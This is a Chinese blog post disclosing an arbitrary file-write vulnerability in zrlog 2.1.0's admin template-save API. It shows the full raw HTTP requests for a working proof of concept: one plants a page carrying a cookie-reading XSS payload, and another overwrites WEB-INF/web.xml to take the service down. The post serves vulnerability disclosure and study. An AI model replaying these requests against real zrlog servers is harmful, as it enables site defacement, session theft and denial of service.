zrlog2.1.0文件写入漏洞

影响版本:

zrlog2.1.0

复现环境

apache-tomcat-7.0.86

jdk1.8

mysql Ver 8.0.28-0ubuntu0.20.04.3 for Linux on x86_64 ((Ubuntu))

复现过程:

1.环境安装:

https://blog.zrlog.com/post/how-to-install-zrlog

2.登录管理后台,访问错误页面:

image

3.通过提交抓取存储接口信息:

POST /zrlog-2.1.0-3617b2e-release/api/admin/template/saveFile HTTP/1.1
Host: 192.168.8.134:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 400
Origin: http://192.168.8.134:8088
Connection: close
Referer: http://192.168.8.134:8088/zrlog-2.1.0-3617b2e-release/admin/index
Cookie: admin-token=1#313368577A724A4F5659625042303544423344473567484D4C38395036585A42687339544D6669716C4934326C7350747A57354B2F6A3447456B4B7A7458514A446449534C663932393943346258364B613762474263477664373859436A4764746D363970582B7776626F3D

file=%2Ferror%2F403.html&content=%3Chtml%3E%0D%0A%3Chead%3E%0D%0A++++%3Ctitle%3E403+Forbidden%3C%2Ftitle%3E%0D%0A%3C%2Fhead%3E%0D%0A%3Cbody+bgcolor%3D'white'%3E%0D%0A%3Ccenter%3E%0D%0A++++%3Ch1%3E403+Forbidden%3C%2Fh1%3E%0D%0A%3C%2Fcenter%3E%0D%0A%3Chr%3E%0D%0A%3Ccenter%3E%0D%0A++++%3Ca+href%3D'http%3A%2F%2Fwww.zrlog.com'%3EZrLog%3C%2Fa%3E%0D%0A%3C%2Fcenter%3E%0D%0A%3C%2Fbody%3E%0D%0A%3C%2Fhtml%3E

4.修改请求数据:上传的文件名,页面内容

file=%2Ferror%2Fgucogo.html&content=<script>alert(document.cookie)</script>

5.访问的上传的文件gucogo.html

image

6.可以覆盖web.xml文件,并搞崩服务。

POST /zrlog-2.1.0-3617b2e-release/api/admin/template/saveFile HTTP/1.1
Host: 192.168.8.134:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 30
Origin: http://192.168.8.134:8088
Connection: close
Referer: http://192.168.8.134:8088/zrlog-2.1.0-3617b2e-release/admin/index
Cookie: admin-token=1#313368577A724A4F5659625042303544423344473567484D4C38395036585A42687339544D6669716C4934326C7350747A57354B2F6A3447456B4B7A7458514A446449534C663932393943346258364B613762474263477664373859436A4764746D363970582B7776626F3D

file=/WEB-INF/web.xml&content=

服务down掉

image

原理分析:

CMS在进行“错误页面编辑”时,未经过任何过滤就进行了文件路径和文件名的拼接。

posted @ 2022-03-15 01:41  coolcoolha  阅读(191)  评论(0编辑  收藏  举报